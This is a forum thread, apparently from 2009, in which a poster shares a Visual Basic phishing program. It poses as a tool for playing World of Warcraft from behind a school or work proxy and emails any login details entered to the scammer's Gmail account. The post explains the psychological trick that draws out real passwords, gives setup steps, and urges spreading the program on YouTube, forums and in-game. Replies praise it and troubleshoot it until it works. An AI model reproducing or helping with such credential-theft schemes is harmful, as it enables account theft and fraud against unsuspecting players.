Enjoy you rep my good man
Hello,
I'm taking my first steps in VB, so I decided to follow this tutorial to make my own scamming program.
The concept:
I've seen a lot of people looking for a program they can use to play WoW from school / work / wherever, because the proxy they are behind blocks the game ports. So this little program makes them think they will actually be able to play from behind a proxy.
Note: on most proxies the ports for the google smtp (465 and 587) are open, but if it's not the case you might want to use port 25.
Here is how it looks like:
Here's what happens when you click on "Play":
This message has a psychological purpose: most people will first enter a wrong username or password to see what happens. Thanks to this, they will be more tempted to try it out with their real account data.
Here is how the mails you will receive look like (header):
In the body of the mail you will of course find the full data they typed in.
Here is the link to the VB project: MEGAUPLOAD - The leading online storage and file delivery service
All you need to do in order to personalize it is the following:
- In the code for form1.vb, replace all the "[email protected]" with the gmail account you'll use. Also replace "yourgmailpassword" with, of course, the password to that e-mail address.
- Once this is done, you can generate your project to test it out (see if you receive the mails etc).
- Don't forget to advertize your program on youTube / forums / even in-game!
- If you do not want nearly everyone on this forum "scamming your scam", I strongly suggest you to check out this thread: http://www.mmowned.com/forums/wow-sc...isher-app.html
Enjoy.
Edit (clarification): you need vb express or visual studio to edit / compile this program. Just changing it in notepad won't do anything.
Last edited by Achi3; 08-09-2009 at 07:35 PM.
Enjoy you rep my good man
Barrόga Agus Pόga ό Banksey
:hug::smooch:
+rep this is awesome
look original, nice graphics, i dont know too much of vb(c++ progmr here) but if you can change the border for "none" could looks more.. nice(?), making your custom exit button or something like that will be a good idea and looks less "windows sotfware".
just my opinion =).
/goodjob
Very nice graphics looks kewlKeep it up
looks promising, going to try
Thanks!! +Rep when I can!
Noob question: what do you mean by 'codes' of form1.vb? i can see the icon but i don't know what you mean by the codes.
/shrug
After publishing, when I attempted to test it, I get an error;
Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately.
The specified string is not in the form of required for an e-mail address.
E-mail address format has to be like this: [email protected]
It can give an error if it looks like this: [email protected], or [email protected], etc
Check both the from and to fields, they need to have a valid format.
how do i open the program?
seems like whenever i try and open it .. it doesnt open
+REP,
Works like a dream now.